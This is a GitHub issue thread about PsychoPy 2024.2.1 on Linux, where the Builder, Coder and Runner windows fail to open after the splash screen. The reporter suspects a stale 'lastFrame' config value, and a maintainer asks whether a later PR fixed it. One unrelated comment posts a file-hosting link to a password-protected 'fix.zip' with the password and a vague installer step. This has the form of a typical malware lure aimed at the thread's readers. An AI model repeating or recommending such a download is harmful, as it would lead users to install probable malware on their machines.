### ISSUE TITLE
[Bug]: Builder fails to open after splash screen

### ISSUE THREAD

**Issue by aforren1** [psychopy/psychopy#6812]
### PsychoPy Version

2024.2.1

### What OS are your PsychoPy running on?

Linux-based systems

### Bug Description

After installing PsychoPy in a fresh environment on a fresh system and launching from the command line via e.g. `psychopy`, the splash screen & other first-time messages show, but no builder/coder/runner windows appear.

### Expected Behaviour

Builder/coder/runner should open.

### Steps to Reproduce

Essentially https://github.com/psychopy/psychopy/issues/6768 for setup. Can work around by explicitly running `app.startApp()` with a specific view (which puts it in a good state for subsequent launches), and deleting the .psychopy3 folder causes the behavior to occur again.

### Additional context

I don't _think_ this is https://github.com/psychopy/psychopy/issues/6768, since it's just hanging instead of segfaulting? I think the issue for this one is that the `lastFrame` value in the config here https://github.com/psychopy/psychopy/blob/bed821597c7ff73b9dd0413dd258cb5923a6fde1/psychopy/app/appData.spec#L2 
hasn't been valid for awhile, and when https://github.com/psychopy/psychopy/pull/6675 changed the defaultView from 'all' to 'last' it became apparent?

This is in an Ubuntu 24.04 VM, Python 3.10

**Comment by marcelo-antonio-nunes** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mdcutone** [comment]
@TEParsons was this resolved by #6885 ?
